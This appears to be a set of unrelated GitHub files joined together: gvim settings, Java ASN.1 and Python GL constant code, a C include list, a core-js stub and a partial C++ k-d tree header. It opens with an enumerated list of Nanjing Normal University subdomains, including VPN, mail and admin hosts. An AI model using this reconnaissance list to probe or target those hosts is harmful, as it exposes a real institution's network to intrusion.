www.www.computer.njnu.edu.cn
ggglxy.njnu.edu.cn
tzb.njnu.edu.cn
hyywz.njnu.edu.cn
mpa.njnu.edu.cn
zhzyz.njnu.edu.cn
xzb.njnu.edu.cn
urp.njnu.edu.cn
email.njnu.edu.cn
oa.njnu.edu.cn
dky.njnu.edu.cn
paxy.njnu.edu.cn
xyzx.njnu.edu.cn
ttc.njnu.edu.cn
proxy.njnu.edu.cn
xkjs.njnu.edu.cn
www.kingsoft.njnu.edu.cn
zbzs.njnu.edu.cn
kc.njnu.edu.cn
sjjx.njnu.edu.cn
jyshx.njnu.edu.cn
yt.njnu.edu.cn
cc.njnu.edu.cn
xyy.njnu.edu.cn
jyxl.njnu.edu.cn
120.njnu.edu.cn
yx.njnu.edu.cn
ent.qq.com.njnu.edu.cn
opac.njnu.edu.cn
pg.njnu.edu.cn
hmbooks.njnu.edu.cn
law.njnu.edu.cn
zxks.njnu.edu.cn
zr.njnu.edu.cn
wpad.njnu.edu.cn
xgb.njnu.edu.cn
moring.njnu.edu.cn
yjsrep.njnu.edu.cn
spanb.njnu.edu.cn
sxy.njnu.edu.cn
dlc.njnu.edu.cn
zbjw.njnu.edu.cn
jscx.njnu.edu.cn
3434.njnu.edu.cn
httpzbzs.njnu.edu.cn
bzzx.njnu.edu.cn
wap.njnu.edu.cn
liboa.njnu.edu.cn
spece.njnu.edu.cn
www.jxw.njnu.edu.cn
gbgl.njnu.edu.cn
ha.njnu.edu.cn
fx.njnu.edu.cn
ginling.njnu.edu.cn
dag.njnu.edu.cn
app.njnu.edu.cn
xxgkold.njnu.edu.cn
shjs.njnu.edu.cn
nsdgh.njnu.edu.cn
jsjyyjs.njnu.edu.cn
jxw.njnu.edu.cn
jwl.njnu.edu.cn
honors.njnu.edu.cn
w.njnu.edu.cn
www.y.njnu.edu.cn
jx.njnu.edu.cn
computer.njnu.edu.cn
clp.njnu.edu.cn
lab.njnu.edu.cn
www.tt.njnu.edu.cn
fdyjd.njnu.edu.cn
bb.njnu.edu.cn
fxy.njnu.edu.cn
j.njnu.edu.cn
marx.njnu.edu.cn
mathyz.njnu.edu.cn
libs.njnu.edu.cn
fz.njnu.edu.cn
software.njnu.edu.cn
my.njnu.edu.cn
account.njnu.edu.cn
sjc.njnu.edu.cn
wws.njnu.edu.cn
ltx.njnu.edu.cn
ma.njnu.edu.cn
welcome.njnu.edu.cn
morning.njnu.edu.cn
hpc.njnu.edu.cn
energy.njnu.edu.cn
yz.njnu.edu.cn
d.njnu.edu.cn
www.math.njnu.edu.cn
jsegciac.njnu.edu.cn
dy.njnu.edu.cn
jsjyxy.njnu.edu.cn
zb.njnu.edu.cn
det.njnu.edu.cn
css.njnu.edu.cn
newyjs.njnu.edu.cn
ecost.njnu.edu.cn
www.grd.njnu.edu.cn
add.njnu.edu.cn
spa.njnu.edu.cn
lib.njnu.edu.cn
cwc.njnu.edu.cn
msxy.njnu.edu.cn
tv.njnu.edu.cn
ggy.njnu.edu.cn
xxgk.njnu.edu.cn
zrt.njnu.edu.cn
www.njnu.edu.cn
ysxk.njnu.edu.cn
jly.njnu.edu.cn
xlxy.njnu.edu.cn
jny.njnu.edu.cn
bsh.njnu.edu.cn
shgs.njnu.edu.cn
xzeu.njnu.edu.cn
lxsgl.njnu.edu.cn
wyadmin.njnu.edu.cn
hetc.njnu.edu.cn
hqglc.njnu.edu.cn
hky.njnu.edu.cn
elearning.njnu.edu.cn
chem.njnu.edu.cn
sky.njnu.edu.cn
tt.njnu.edu.cn
jgdw.njnu.edu.cn
e.njnu.edu.cn
hpjh.njnu.edu.cn
xy.njnu.edu.cn
wy.njnu.edu.cn
sh.njnu.edu.cn
www.jwc.njnu.edu.cn
wyold.njnu.edu.cn
n.njnu.edu.cn
jsdp.njnu.edu.cn
fgc.njnu.edu.cn
dwb.njnu.edu.cn
eol.njnu.edu.cn
ww.njnu.edu.cn
www2.njnu.edu.cn
dyw.njnu.edu.cn
jw.njnu.edu.cn
afnanjing.njnu.edu.cn
spzx.njnu.edu.cn
mail.njnu.edu.cn
sfy.njnu.edu.cn
cx.njnu.edu.cn
geo.njnu.edu.cn
kjc.njnu.edu.cn
ecard.njnu.edu.cn
3g.zxks.njnu.edu.cn
xgc.njnu.edu.cn
orchid.njnu.edu.cn
211gl.njnu.edu.cn
press.njnu.edu.cn
geoladder.njnu.edu.cn
www.0101.njnu.edu.cn
shky.njnu.edu.cn
bamboo.njnu.edu.cn
ccer.njnu.edu.cn
cw.njnu.edu.cn
xinchuan.njnu.edu.cn
net.njnu.edu.cn
newoa.njnu.edu.cn
jwx.njnu.edu.cn
www.bb.njnu.edu.cn
211.njnu.edu.cn
sun.njnu.edu.cn
jsw.njnu.edu.cn
grad.njnu.edu.cn
psych2013.njnu.edu.cn
jwjl.njnu.edu.cn
xg.njnu.edu.cn
gkzp.njnu.edu.cn
ghjjc.njnu.edu.cn
jsjy.njnu.edu.cn
njnu.edu.cn
job.njnu.edu.cn
wwww.njnu.edu.cn
proxylib.njnu.edu.cn
vgekl.njnu.edu.cn
cwcx.njnu.edu.cn
metc.njnu.edu.cn
jysx.njnu.edu.cn
7dd.njnu.edu.cn
dlib.njnu.edu.cn
105.njnu.edu.cn
xgks.njnu.edu.cn
jwgl.njnu.edu.cn
pay.njnu.edu.cn
sxystu.njnu.edu.cn
zzb.njnu.edu.cn
pop3.njnu.edu.cn
zgzj.njnu.edu.cn
kcyjx.njnu.edu.cn
jky.njnu.edu.cn
bbs.njnu.edu.cn
js2011gis.njnu.edu.cn
gpjh.njnu.edu.cn
mba.njnu.edu.cn
ece.njnu.edu.cn
wd.njnu.edu.cn
yzadmin.njnu.edu.cn
mail1.njnu.edu.cn
gjc.njnu.edu.cn
gym.njnu.edu.cn
0708.njnu.edu.cn
lx.njnu.edu.cn
zzc.njnu.edu.cn
by.njnu.edu.cn
vpn.njnu.edu.cn
skc.njnu.edu.cn
gfs.njnu.edu.cn
xleu.njnu.edu.cn
zbvip.njnu.edu.cn
nnuaa.njnu.edu.cn
jsjx.njnu.edu.cn
1010.njnu.edu.cn
www.gra.njnu.edu.cn
| {
"pile_set_name": "Github"
} |
"===============================================================================
"
" File: customization.gvimrc
"
" Description: suggestion for a personal configuration file ~/.gvimrc
"
" VIM Version: 7.0+
" Author: Wolfgang Mehner, [email protected]
" Dr. Fritz Mehner (fgm), [email protected]
" Revision: 16.04.2019
" License: Copyright (c) 2009-2018, Dr. Fritz Mehner
" Copyright (c) 2019, Wolfgang Mehner
"===============================================================================
"===============================================================================
" GENERAL SETTINGS
"===============================================================================
set cmdheight=2 " Make command line two lines high
set mousehide " Hide the mouse when typing text

" GUI colour tweaks: light grey canvas, blue block cursor (cyan when an
" input-method language mapping is active), and a slightly lighter grey
" background behind Constant/Special syntax items.
highlight Normal guibg=grey90
highlight Cursor guibg=Blue guifg=NONE
highlight lCursor guibg=Cyan guifg=NONE
highlight NonText guibg=grey80
highlight Constant gui=NONE guibg=grey95
highlight Special gui=NONE guibg=grey95

let c_comment_strings=1 " highlight strings inside C comments

"-------------------------------------------------------------------------------
" Moving cursor to other windows
"
" shift-down : change window focus to lower one (cyclic)
" shift-up : change window focus to upper one (cyclic)
" shift-left : change window focus to one on left
" shift-right : change window focus to one on right
"-------------------------------------------------------------------------------
nnoremap <s-down> <c-w>w
nnoremap <s-up> <c-w>W
nnoremap <s-left> <c-w>h
nnoremap <s-right> <c-w>l

"-------------------------------------------------------------------------------
" Some additional hot keys
"
" shift-F3 : call gvim file browser
"-------------------------------------------------------------------------------
noremap <silent> <s-F3> :silent browse confirm e<CR>
inoremap <silent> <s-F3> <Esc>:silent browse confirm e<CR>

"-------------------------------------------------------------------------------
" toggle insert mode <--> normal mode with the <RightMouse>-key
"-------------------------------------------------------------------------------
nnoremap <RightMouse> <Insert>
inoremap <RightMouse> <ESC>

"-------------------------------------------------------------------------------
" use font with clearly distinguishable brackets: ()[]{}
"-------------------------------------------------------------------------------
"set guifont=Luxi\ Mono\ 14
| {
"pile_set_name": "Github"
} |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
/**
* @author Stepan M. Mishura
* @version $Revision$
*/
package org.apache.harmony.security.asn1;
import java.io.IOException;
import java.util.Arrays;
/**
* This class represents ASN.1 Enumerated type.
*
* @see <a href="http://asn1.elibel.tm.fr/en/standards/index.htm">ASN.1</a>
*/
public final class ASN1Enumerated extends ASN1Primitive {

    // default implementation (shared singleton returned by getInstance())
    private static final ASN1Enumerated ASN1 = new ASN1Enumerated();

    /**
     * Constructs ASN.1 Enumerated type
     *
     * The constructor is provided for inheritance purposes
     * when there is a need to create a custom ASN.1 Enumerated type.
     * To get a default implementation it is recommended to use
     * getInstance() method.
     */
    public ASN1Enumerated() {
        super(TAG_ENUM);
    }

    /**
     * Returns ASN.1 Enumerated type default implementation
     *
     * The default implementation works with encoding
     * that is represented as byte array.
     *
     * @return ASN.1 Enumerated type default implementation
     */
    public static ASN1Enumerated getInstance() {
        return ASN1;
    }

    /**
     * Decodes an ENUMERATED value from the stream.  In verification-only
     * mode ({@code in.isVerify}) the content is consumed and checked but no
     * object is materialized, hence the intentional {@code null} return.
     *
     * @param in BER input stream positioned at the enumerated content
     * @return the decoded value as a byte array, or {@code null} in verify mode
     * @throws IOException on malformed input or read failure
     */
    public Object decode(BerInputStream in) throws IOException {
        in.readEnumerated();

        if (in.isVerify) {
            return null;
        }
        return getDecodedObject(in);
    }

    /**
     * Extracts array of bytes from BER input stream.
     *
     * The copy spans the current content region
     * ({@code contentOffset .. contentOffset + length}) of the stream buffer.
     *
     * @return array of bytes
     */
    public Object getDecodedObject(BerInputStream in) throws IOException {
        return Arrays.copyOfRange(in.buffer, in.contentOffset, in.contentOffset + in.length);
    }

    /**
     * Writes the content octets; ENUMERATED shares INTEGER's encoding.
     */
    public void encodeContent(BerOutputStream out) {
        out.encodeInteger();
    }

    /**
     * Sets the content length from the raw byte-array content before encoding.
     */
    public void setEncodingContent(BerOutputStream out) {
        out.length = ((byte[]) out.content).length;
    }
}
| {
"pile_set_name": "Github"
} |
# Constant definitions for the legacy SGI IRIS GL bindings (Python 2 only).
# The module body is a flat table of named integer/float constants mirroring
# the C <gl/gl.h> style headers; values are part of the wire-level API and
# must never be changed.
from warnings import warnpy3k
warnpy3k("the GL module has been removed in Python 3.0", stacklevel=2)
del warnpy3k

# Generic values.
NULL = 0
FALSE = 0
TRUE = 1

# Stack depth limits.
ATTRIBSTACKDEPTH = 10
VPSTACKDEPTH = 8
MATRIXSTACKDEPTH = 32
NAMESTACKDEPTH = 1025

# Display-list tags.
STARTTAG = -2
ENDTAG = -3

# Basic colour-map indices.
BLACK = 0
RED = 1
GREEN = 2
YELLOW = 3
BLUE = 4
MAGENTA = 5
CYAN = 6
WHITE = 7

# Pop-up colour indices.
PUP_CLEAR = 0
PUP_COLOR = 1
PUP_BLACK = 2
PUP_WHITE = 3

# Drawmode bit flags.
NORMALDRAW = 0x010
PUPDRAW = 0x020
OVERDRAW = 0x040
UNDERDRAW = 0x080
CURSORDRAW = 0x100
DUALDRAW = 0x200

# Pattern sizes (edge length and word counts).
PATTERN_16 = 16
PATTERN_32 = 32
PATTERN_64 = 64
PATTERN_16_SIZE = 16
PATTERN_32_SIZE = 64
PATTERN_64_SIZE = 256

# readsource() values.
SRC_AUTO = 0
SRC_FRONT = 1
SRC_BACK = 2
SRC_ZBUFFER = 3
SRC_PUP = 4
SRC_OVER = 5
SRC_UNDER = 6
SRC_FRAMEGRABBER = 7

# Blending factors (blendfunction()).
BF_ZERO = 0
BF_ONE = 1
BF_DC = 2
BF_SC = 2
BF_MDC = 3
BF_MSC = 3
BF_SA = 4
BF_MSA = 5
BF_DA = 6
BF_MDA = 7
BF_MIN_SA_MDA = 8

# Alpha-test functions (afunction()).
AF_NEVER = 0
AF_LESS = 1
AF_EQUAL = 2
AF_LEQUAL = 3
AF_GREATER = 4
AF_NOTEQUAL = 5
AF_GEQUAL = 6
AF_ALWAYS = 7

# Z-buffer comparison functions (zfunction()).
ZF_NEVER = 0
ZF_LESS = 1
ZF_EQUAL = 2
ZF_LEQUAL = 3
ZF_GREATER = 4
ZF_NOTEQUAL = 5
ZF_GEQUAL = 6
ZF_ALWAYS = 7

# Z source.
ZSRC_DEPTH = 0
ZSRC_COLOR = 1

# Point smoothing modes.
SMP_OFF = 0x0
SMP_ON = 0x1
SMP_SMOOTHER = 0x2

# Line smoothing modes.
SML_OFF = 0x0
SML_ON = 0x1
SML_SMOOTHER = 0x2
SML_END_CORRECT = 0x4

# Polygon smoothing modes.
PYSM_OFF = 0
PYSM_ON = 1
PYSM_SHRINK = 2

# Dither modes.
DT_OFF = 0
DT_ON = 1

# Pop-up menu item flags.
PUP_NONE = 0
PUP_GREY = 0x1
PUP_BOX = 0x2
PUP_CHECK = 0x4

# glcompat() compatibility selectors.
GLC_OLDPOLYGON = 0
GLC_ZRANGEMAP = 1
GLC_MQUEUERATE = 2
GLC_SOFTATTACH = 3
GLC_MANAGEBG = 4
GLC_SLOWMAPCOLORS = 5
GLC_INPUTCHANGEBUG = 6
GLC_NOBORDERBUG = 7
GLC_SET_VSYNC = 8
GLC_GET_VSYNC = 9
GLC_VSYNC_SLEEP = 10
GLC_COMPATRATE = 15

# Cursor types.
C16X1 = 0
C16X2 = 1
C32X1 = 2
C32X2 = 3
CCROSS = 4

# Shading models.
FLAT = 0
GOURAUD = 1

# Logical raster operations (logicop()), 4-bit truth tables.
LO_ZERO = 0x0
LO_AND = 0x1
LO_ANDR = 0x2
LO_SRC = 0x3
LO_ANDI = 0x4
LO_DST = 0x5
LO_XOR = 0x6
LO_OR = 0x7
LO_NOR = 0x8
LO_XNOR = 0x9
LO_NDST = 0xa
LO_ORR = 0xb
LO_NSRC = 0xc
LO_ORI = 0xd
LO_NAND = 0xe
LO_ONE = 0xf

# Screen selector: follow input focus.
INFOCUSSCRN = -2

# Stencil operations.
ST_KEEP = 0
ST_ZERO = 1
ST_REPLACE = 2
ST_INCR = 3
ST_DECR = 4
ST_INVERT = 5

# Stencil comparison functions.
SF_NEVER = 0
SF_LESS = 1
SF_EQUAL = 2
SF_LEQUAL = 3
SF_GREATER = 4
SF_NOTEQUAL = 5
SF_GEQUAL = 6
SF_ALWAYS = 7

# Stencil source.
SS_OFF = 0
SS_DEPTH = 1

# Polygon drawing modes (polymode()).
PYM_FILL = 1
PYM_POINT = 2
PYM_LINE = 3
PYM_HOLLOW = 4
PYM_LINE_FAST = 5

# Fog modes (fogvertex()).
FG_OFF = 0
FG_ON = 1
FG_DEFINE = 2
FG_VTX_EXP = 2
FG_VTX_LIN = 3
FG_PIX_EXP = 4
FG_PIX_LIN = 5
FG_VTX_EXP2 = 6
FG_PIX_EXP2 = 7

# Pixel-transfer modes (pixmode()).
PM_SHIFT = 0
PM_EXPAND = 1
PM_C0 = 2
PM_C1 = 3
PM_ADD24 = 4
PM_SIZE = 5
PM_OFFSET = 6
PM_STRIDE = 7
PM_TTOB = 8
PM_RTOL = 9
PM_ZDATA = 10
PM_WARP = 11
PM_RDX = 12
PM_RDY = 13
PM_CDX = 14
PM_CDY = 15
PM_XSTART = 16
PM_YSTART = 17
PM_VO1 = 1000

# Normal-vector handling (nmode()).
NAUTO = 0
NNORMALIZE = 1

# Accumulation-buffer operations (acbuf()).
AC_CLEAR = 0
AC_ACCUMULATE = 1
AC_CLEAR_ACCUMULATE = 2
AC_RETURN = 3
AC_MULT = 4
AC_ADD = 5

# Clip-plane modes (clipplane()).
CP_OFF = 0
CP_ON = 1
CP_DEFINE = 2

# Scrbox modes.
SB_RESET = 0
SB_TRACK = 1
SB_HOLD = 2

# readdisplay() bit flags.
RD_FREEZE = 0x00000001
RD_ALPHAONE = 0x00000002
RD_IGNORE_UNDERLAY = 0x00000004
RD_IGNORE_OVERLAY = 0x00000008
RD_IGNORE_PUP = 0x00000010
RD_OFFSCREEN = 0x00000020

# getgdesc() inquiry selectors.
GD_XPMAX = 0
GD_YPMAX = 1
GD_XMMAX = 2
GD_YMMAX = 3
GD_ZMIN = 4
GD_ZMAX = 5
GD_BITS_NORM_SNG_RED = 6
GD_BITS_NORM_SNG_GREEN = 7
GD_BITS_NORM_SNG_BLUE = 8
GD_BITS_NORM_DBL_RED = 9
GD_BITS_NORM_DBL_GREEN = 10
GD_BITS_NORM_DBL_BLUE = 11
GD_BITS_NORM_SNG_CMODE = 12
GD_BITS_NORM_DBL_CMODE = 13
GD_BITS_NORM_SNG_MMAP = 14
GD_BITS_NORM_DBL_MMAP = 15
GD_BITS_NORM_ZBUFFER = 16
GD_BITS_OVER_SNG_CMODE = 17
GD_BITS_UNDR_SNG_CMODE = 18
GD_BITS_PUP_SNG_CMODE = 19
GD_BITS_NORM_SNG_ALPHA = 21
GD_BITS_NORM_DBL_ALPHA = 22
GD_BITS_CURSOR = 23
GD_OVERUNDER_SHARED = 24
GD_BLEND = 25
GD_CIFRACT = 26
GD_CROSSHAIR_CINDEX = 27
GD_DITHER = 28
GD_LINESMOOTH_CMODE = 30
GD_LINESMOOTH_RGB = 31
GD_LOGICOP = 33
GD_NSCRNS = 35
GD_NURBS_ORDER = 36
GD_NBLINKS = 37
GD_NVERTEX_POLY = 39
GD_PATSIZE_64 = 40
GD_PNTSMOOTH_CMODE = 41
GD_PNTSMOOTH_RGB = 42
GD_PUP_TO_OVERUNDER = 43
GD_READSOURCE = 44
GD_READSOURCE_ZBUFFER = 48
GD_STEREO = 50
GD_SUBPIXEL_LINE = 51
GD_SUBPIXEL_PNT = 52
GD_SUBPIXEL_POLY = 53
GD_TRIMCURVE_ORDER = 54
GD_WSYS = 55
GD_ZDRAW_GEOM = 57
GD_ZDRAW_PIXELS = 58
GD_SCRNTYPE = 61
GD_TEXTPORT = 62
GD_NMMAPS = 63
GD_FRAMEGRABBER = 64
GD_TIMERHZ = 66
GD_DBBOX = 67
GD_AFUNCTION = 68
GD_ALPHA_OVERUNDER = 69
GD_BITS_ACBUF = 70
GD_BITS_ACBUF_HW = 71
GD_BITS_STENCIL = 72
GD_CLIPPLANES = 73
GD_FOGVERTEX = 74
GD_LIGHTING_TWOSIDE = 76
GD_POLYMODE = 77
GD_POLYSMOOTH = 78
GD_SCRBOX = 79
GD_TEXTURE = 80
GD_FOGPIXEL = 81
GD_TEXTURE_PERSP = 82
GD_MUXPIPES = 83

# Special getgdesc() return values.
GD_NOLIMIT = -2
GD_WSYS_NONE = 0
GD_WSYS_4S = 1
GD_SCRNTYPE_WM = 0
GD_SCRNTYPE_NOWM = 1

# NURBS properties.
N_PIXEL_TOLERANCE = 1
N_CULLING = 2
N_DISPLAY = 3
N_ERRORCHECKING = 4
N_SUBDIVISIONS = 5
N_S_STEPS = 6
N_T_STEPS = 7
N_TILES = 8
N_TMP1 = 9
N_TMP2 = 10
N_TMP3 = 11
N_TMP4 = 12
N_TMP5 = 13
N_TMP6 = 14
N_FILL = 1.0
N_OUTLINE_POLY = 2.0
N_OUTLINE_PATCH = 5.0
N_ISOLINE_S = 12.0

# NURBS vertex-data type codes (two naming schemes for the same values).
N_ST = 0x8
N_STW = 0xd
N_XYZ = 0x4c
N_XYZW = 0x51
N_TEX = 0x88
N_TEXW = 0x8d
N_RGBA = 0xd0
N_RGBAW = 0xd5
N_P2D = 0x8
N_P2DR = 0xd
N_V3D = 0x4c
N_V3DR = 0x51
N_T2D = 0x88
N_T2DR = 0x8d
N_C4D = 0xd0
N_C4DR = 0xd5

# Lighting-model terminator and matrix modes.
LMNULL = 0.0
MSINGLE = 0
MPROJECTION = 1
MVIEWING = 2
MTEXTURE = 3

# Lighting limits and lmdef()/lmbind() property identifiers.
MAXLIGHTS = 8
MAXRESTRICTIONS = 4
DEFMATERIAL = 0
EMISSION = 1
AMBIENT = 2
DIFFUSE = 3
SPECULAR = 4
SHININESS = 5
COLORINDEXES = 6
ALPHA = 7
DEFLIGHT = 100
LCOLOR = 101
POSITION = 102
SPOTDIRECTION = 103
SPOTLIGHT = 104
DEFLMODEL = 200
LOCALVIEWER = 201
ATTENUATION = 202
ATTENUATION2 = 203
TWOSIDE = 204
MATERIAL = 1000
BACKMATERIAL = 1001
LIGHT0 = 1100
LIGHT1 = 1101
LIGHT2 = 1102
LIGHT3 = 1103
LIGHT4 = 1104
LIGHT5 = 1105
LIGHT6 = 1106
LIGHT7 = 1107
LMODEL = 1200

# lmcolor() modes.
LMC_COLOR = 0
LMC_EMISSION = 1
LMC_AMBIENT = 2
LMC_DIFFUSE = 3
LMC_SPECULAR = 4
LMC_AD = 5
LMC_NULL = 6

# Texture parameters (texdef2d()).
TX_MINFILTER = 0x100
TX_MAGFILTER = 0x200
TX_WRAP = 0x300
TX_WRAP_S = 0x310
TX_WRAP_T = 0x320
TX_TILE = 0x400
TX_BORDER = 0x500
TX_NULL = 0x000
TX_POINT = 0x110
TX_BILINEAR = 0x220
TX_MIPMAP = 0x120
TX_MIPMAP_POINT = 0x121
TX_MIPMAP_LINEAR = 0x122
TX_MIPMAP_BILINEAR = 0x123
TX_MIPMAP_TRILINEAR = 0x124
TX_REPEAT = 0x301
TX_CLAMP = 0x302
TX_SELECT = 0x303
TX_TEXTURE_0 = 0

# Texture environment (tevdef()).
TV_MODULATE = 0x101
TV_BLEND = 0x102
TV_DECAL = 0x103
TV_COLOR = 0x200
TV_NULL = 0x000
TV_ENV0 = 0

# Texture coordinate generation (texgen()).
TX_S = 0
TX_T = 1
TG_OFF = 0
TG_ON = 1
TG_CONTOUR = 2
TG_LINEAR = 3
TG_SPHEREMAP = 4
TG_REFRACTMAP = 5

# Distributed GL connection types.
DGLSINK = 0
DGLLOCAL = 1
DGLTSOCKET = 2
DGL4DDN = 3

# Pop-up cursor colour (alias of PUP_COLOR).
PUP_CURSOR = PUP_COLOR

# Error severity levels.
FATAL = 1
WARNING = 2
ASK_CONT = 3
ASK_RESTART = 4

# Maximum pixel coordinates for the supported monitor types.
XMAXSCREEN = 1279
YMAXSCREEN = 1023
XMAXMEDIUM = 1023
YMAXMEDIUM = 767
XMAX170 = 645
YMAX170 = 484
XMAXPAL = 779
YMAXPAL = 574
| {
"pile_set_name": "Github"
} |
/*
* Program: Operating-system dependent routines -- Windows 2000 version
*
* Author: Mark Crispin
* Networks and Distributed Computing
* Computing & Communications
* University of Washington
* Administration Building, AG-44
* Seattle, WA 98195
* Internet: [email protected]
*
* Date: 11 April 1989
* Last Edited: 4 March 2003
*
* The IMAP toolkit provided in this Distribution is
* Copyright 1988-2003 University of Washington.
* The full text of our legal notices is contained in the file called
* CPYRIGHT, included with this Distribution.
*/
#include "tcp_nt.h" /* must be before osdep includes tcp.h */
#undef ERROR /* quell conflicting def warning */
#include "mail.h"
#include "osdep.h"
#include <stdio.h>
#include <time.h>
#include <errno.h>
#include <sys\timeb.h>
#include <fcntl.h>
#include <sys\stat.h>
#include "misc.h"
#include "mailfile.h"
#include "fs_nt.c"
#include "ftl_nt.c"
#include "nl_nt.c"
#include "yunchan.c"
#include "kerb_w2k.c"
#include "env_nt.c"
#include "ssl_w2k.c"
#include "tcp_nt.c"
| {
"pile_set_name": "Github"
} |
// core-js entry point for the ES6 `String.fromCodePoint` polyfill.
// Requiring the feature module installs the implementation onto the internal
// `_core` namespace as a side effect; we then re-export that implementation.
require('../../modules/es6.string.from-code-point');
module.exports = require('../../modules/_core').String.fromCodePoint;
| {
"pile_set_name": "Github"
} |
// -*- C++ -*- Copyright (c) Microsoft Corporation; see license.txt
#ifndef MESH_PROCESSING_LIBHH_KDTREE_H_
#define MESH_PROCESSING_LIBHH_KDTREE_H_
#include "libHh/Array.h"
#include "libHh/RangeOp.h"
#include "libHh/SGrid.h"
#include "libHh/Stack.h"
#include "libHh/Stat.h"
#include "libHh/Vec.h"
namespace hh {
// A k-D tree is a spatial structure that splits space using hyperplanes in successive dimensions.
// In this implementation, the original bounding volume is the unit cube, and the hyperplane always splits
// the current dimension at the midpoint of the current range.
// Each element is represented using a bounding box.
// When an element is entered into the tree, it is pushed down the tree until the box straddles the two child nodes.
// Large elements may be pushed down both children if the allow_duplication threshold is set.
template <typename T, int D> class Kdtree : noncopyable {
using type = Kdtree<T, D>;
public:
explicit Kdtree(int maxlevel = 8) : _maxlevel(maxlevel) { constructor_i(); }
~Kdtree() { clear(); }
void clear() { clear_i(); }
void allow_duplication(float fsize) {
if (!getenv("KD_FSIZE")) _fsize = fsize;
}
// bb0 and bb1 are copied internally
void enter(const T& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) { enter_i(id, bb0, bb1); }
void enter(T&& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) { enter_i(std::move(id), bb0, bb1); }
// search is reentrant (for HiddenLineRemoval).
// Start searching at loc (default _root) for objects whose bb intersect the one given.
// For each object found, call cbfunc with id, bb, and current location in the tree.
// cbfunc may modify the bb by shrinking it.
enum class ECallbackReturn { nothing, bbshrunk, stop };
using CBloc = int;
// ret: was_stopped
template <typename Func = ECallbackReturn(const T& id, Vec<float, D>& bb0, Vec<float, D>& bb1, CBloc floc)>
bool search(Vec<float, D>& bb0, Vec<float, D>& bb1, Func cbfunc, CBloc loc = 0) const {
return search_i(bb0, bb1, cbfunc, loc);
}
void print() const { rec_print((!_arnode.num() ? -1 : 0), 0); }
private:
const int _maxlevel; // maximum # of subdivision on each axis
float _fsize{0.f}; // ok to duplicate if average edge length < _fsize
struct Entry {
Entry() = default;
Entry(const T& id) : _id(id) {}
Entry(T&& id) noexcept : _id(std::move(id)) {}
Entry& operator=(Entry&& e) noexcept {
_id = std::move(e._id);
_bb = e._bb;
return *this;
}
T _id;
SGrid<float, 2, D> _bb; // bounding box on entry
};
struct Node {
Node() = default;
Node(int axis, float val) : _axis(axis), _val(val) {}
Stack<int> _stackei; // Entry indices
int _l{-1}; // lower-valued subtree
int _h{-1}; // higher-valued subtree
int _axis; // 0 .. D - 1
float _val;
};
Array<Entry> _arentry;
Array<Node> _arnode;
//
void constructor_i() {
assertx(_maxlevel > 0);
_fsize = getenv_float("KD_FSIZE", _fsize);
}
void clear_i() {
if (getenv_bool("KD_STATS") && _arnode.num()) {
HH_STAT(SKDdepth);
rec_depth(0, SKDdepth, 0);
}
_arentry.clear();
_arnode.clear();
}
void rec_depth(int ni, Stat& stat, int depth) const {
if (ni < 0) return;
const Node& n = _arnode[ni];
stat.enter_multiple(static_cast<float>(depth), n._stackei.height());
rec_depth(n._l, stat, depth + 1);
rec_depth(n._h, stat, depth + 1);
}
void enter_i(const T& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) {
_arentry.push(Entry(id));
enter_aux(bb0, bb1);
}
void enter_i(T&& id, const Vec<float, D>& bb0, const Vec<float, D>& bb1) {
_arentry.push(Entry(std::move(id)));
enter_aux(bb0, bb1);
}
void enter_aux(const Vec<float, D>& bb0, const Vec<float, D>& bb1) {
int ei = _arentry.num() - 1;
Entry& e = _arentry[ei];
e._bb[0] = bb0;
e._bb[1] = bb1;
Vec<float, D> aval;
fill(aval, .5f);
float avgel = 0.f;
if (_fsize) {
for_int(i, D) avgel += e._bb[1][i] - e._bb[0][i];
avgel /= D;
}
rec_enter(ei, 0, aval, 0, .5f, 0, avgel);
}
// Inserts entry ei into the subtree rooted at node index ni, walking the
// implicit binary partition of the unit cube.  aval holds the split
// coordinates at the current cell, inc the half-width at the current level,
// and axis cycles through 0..D-1.  An entry whose box straddles a split is
// duplicated into both subtrees only while the cell is large relative to the
// entry (see _fsize); otherwise it is stored at the straddled node.
// NOTE(review): _arnode is re-indexed on every access instead of caching a
// Node& — presumably because push/recursion can reallocate the array; confirm.
void rec_enter(int ei, int ni, Vec<float, D>& aval, int level, float inc, int axis, float avgel) {
  ASSERTX(axis >= 0 && axis < D);
  const Entry& e = _arentry[ei];
  for (;;) {
    const float val = aval[axis];
    // Lazily create the node when walking one past the end of the array.
    if (ni == _arnode.num()) _arnode.push(Node(axis, val));
    if (!axis) {  // completed a full cycle of axes -> one level deeper
      if (++level == _maxlevel) break;  // depth limit reached; store here
      inc *= .5f;
    }
    bool want_l = e._bb[0][axis] <= val;  // box reaches below the split
    bool want_h = e._bb[1][axis] >= val;  // box reaches above the split
    if (want_l && want_h) {  // single recursion
      if (!_fsize || avgel >= inc * _fsize) break;  // small enough
      {
        Vec<float, D> naval = aval;
        naval[axis] -= inc;
        if (_arnode[ni]._l < 0) _arnode[ni]._l = _arnode.num();
        rec_enter(ei, _arnode[ni]._l, naval, level, inc, (axis < D - 1 ? axis + 1 : 0), avgel);
      }
      if (_arnode[ni]._h < 0) _arnode[ni]._h = _arnode.num();
      ni = _arnode[ni]._h;
      aval[axis] += inc;
    } else if (want_l) {
      if (_arnode[ni]._l < 0) _arnode[ni]._l = _arnode.num();
      ni = _arnode[ni]._l;
      aval[axis] -= inc;
    } else if (want_h) {
      if (_arnode[ni]._h < 0) _arnode[ni]._h = _arnode.num();
      ni = _arnode[ni]._h;
      aval[axis] += inc;
    } else {
      assertnever("");
    }
    axis = axis < D - 1 ? axis + 1 : 0;
  }
  _arnode[ni]._stackei.push(ei);
}
// Entry point for a range query over box [bb0, bb1] starting at node ni.
// Returns true if the callback requested an early stop.  bb0/bb1 are
// non-const because cbfunc may shrink the query box during the search
// (see "bb may have changed" in rec_search).
